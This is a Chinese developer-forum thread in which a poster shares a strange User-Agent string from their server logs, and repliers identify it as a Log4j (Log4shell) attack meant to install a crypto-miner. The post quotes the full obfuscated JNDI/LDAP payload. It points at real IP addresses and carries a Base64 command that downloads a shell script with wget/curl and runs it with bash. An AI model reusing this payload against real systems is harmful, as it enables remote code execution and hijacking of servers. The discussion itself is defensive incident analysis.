V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
kaka6
V2EX  ›  程序员

User-Agent 注入

  •  
  •   kaka6 · 2022-02-10 10:13:48 +08:00 · 3501 次点击
    这是一个创建于 1027 天前的主题,其中的信息可能已经有所发展或是发生改变。

    年前部署一个接口服务,通过日志,最近发现经常有 User-Agent 异常注入的访问 其中一个比较诡异的内容:

    t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//150.136.111.68:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L2ludGVsLnNoOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvaW50ZWwuc2g7IGJhc2ggaW50ZWwuc2ggNDY4cllRTXhuQ3YzWG9GclhmNWkyUWU5eVpyelZTZGdNV2hqaVAyNjRUQWdKNXc0WGU2UGlKdGFGRjc5amhlNWFIaG1rdVNGOEttc0xkczRyN0hNRHhDelJLbU1UN3o=}')
    

    知道这是干嘛的吗

    avatar

    11 条回复    2022-02-17 09:33:19 +08:00
    ThirdFlame
        1
    ThirdFlame  
       2022-02-10 10:15:25 +08:00
    log4shell
    zhazi
        3
    zhazi  
       2022-02-10 10:22:30 +08:00
    maichaide
        4
    maichaide  
       2022-02-10 11:03:53 +08:00
    下载脚本开启探矿服务
    muzuiget
        5
    muzuiget  
       2022-02-10 13:28:35 +08:00
    Log4j 漏洞,就是赌你用 Log4j 把 UserAgent 记录到日志中,实现远程执行代码。
    yundun2021
        6
    yundun2021  
       2022-02-10 13:34:59 +08:00
    有条件可以上 WAF
    yu1u
        7
    yu1u  
       2022-02-10 13:47:12 +08:00
    log4j 漏洞攻击
    0x73346b757234
        8
    0x73346b757234  
       2022-02-10 18:04:25 +08:00
    对面想通过 Log4j 漏洞下载 xmrig 挖矿脚本。多谢老哥提供了个样本,测了下自己的规则能覆盖,嘿嘿。
    kaka6
        9
    kaka6  
    OP
       2022-02-10 22:29:21 +08:00
    @muzuiget 没有用 Log4j 就没事是吧,我是用 python 的 user_agents 记录
    muzuiget
        10
    muzuiget  
       2022-02-10 23:18:08 +08:00
    @kaka6 没用 Java 肯定没事,对方就是随机扫的。
    kaka6
        11
    kaka6  
    OP
       2022-02-17 09:33:19 +08:00
    又收到不少的 User-Agent:
    Go-http-client/1.1
    python-requests/2.20.1
    curl/7.75.0

    而且还来自世界各地,以前没做这么细的记录,现在全网做记录,发现了不少莫明访客
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1151 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 25ms · UTC 18:46 · PVG 02:46 · LAX 10:46 · JFK 13:46
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.